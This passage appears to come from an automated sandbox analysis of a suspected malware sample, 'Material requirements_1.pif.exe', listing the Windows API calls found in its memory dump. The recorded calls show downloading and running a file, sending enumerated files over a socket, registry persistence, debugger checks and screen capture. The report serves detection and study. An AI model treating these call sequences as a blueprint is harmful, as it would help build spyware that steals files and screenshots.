                        • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                        • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID:
                        • API String ID: 745075371-0
                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                        • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                        • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                        APIs
                        • __EH_prolog.LIBCMT ref: 00407A91
                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                        • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                        • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                        • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                        • _free.LIBCMT ref: 00448077
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00448243
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                        • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                        • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$open
                        • API String ID: 2825088817-1736059791
                        • Opcode ID: e28f25d4d19b8d56baa702e1e00f9abcfc38949ec24a855979b27e8ae747898c
                        • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                        • Opcode Fuzzy Hash: e28f25d4d19b8d56baa702e1e00f9abcfc38949ec24a855979b27e8ae747898c
                        • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID: x@G$x@G
                        • API String ID: 4113138495-3390264752
                        • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                        • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                        • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                        • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                          • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                          • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                        • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                        • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                        • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                        • _wcschr.LIBVCRUNTIME ref: 00450C01
                        • _wcschr.LIBVCRUNTIME ref: 00450C0F
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID:
                        • API String ID: 4212172061-0
                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                        • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                        • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408DAC
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstH_prologNext
                        • String ID:
                        • API String ID: 301083792-0
                        • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                        • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                        • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                        • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                        • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                        • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                        • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                        • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                        APIs
                        • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                        • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                        • ExitProcess.KERNEL32 ref: 0044259E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                        • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                        • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                        • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                        • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                        • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                        • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                        • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                        • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                        • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                        • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                        • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                        • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                        • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                        • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                        • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                        • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                        • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                        APIs
                          • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                        • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                        • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                        • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                        • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                        • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                        • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                        • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                        • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                        • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                        • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                        • Instruction Fuzzy Hash:
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                          • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                        • DeleteDC.GDI32(?), ref: 0041806D
                        • DeleteDC.GDI32(00000000), ref: 00418070
                        • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                        • GetIconInfo.USER32(?,?), ref: 004180DB
                        • DeleteObject.GDI32(?), ref: 0041810A
                        • DeleteObject.GDI32(?), ref: 00418117
                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                        • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                        • DeleteDC.GDI32(?), ref: 0041828F
                        • DeleteDC.GDI32(00000000), ref: 00418292
                        • DeleteObject.GDI32(00000000), ref: 00418295
                        • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                        • DeleteObject.GDI32(00000000), ref: 00418354
                        • GlobalFree.KERNEL32(?), ref: 0041835B
                        • DeleteDC.GDI32(?), ref: 0041836B
                        • DeleteDC.GDI32(00000000), ref: 00418376
                        • DeleteDC.GDI32(?), ref: 004183A8
                        • DeleteDC.GDI32(00000000), ref: 004183AB
                        • DeleteObject.GDI32(?), ref: 004183B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 1765752176-865373369
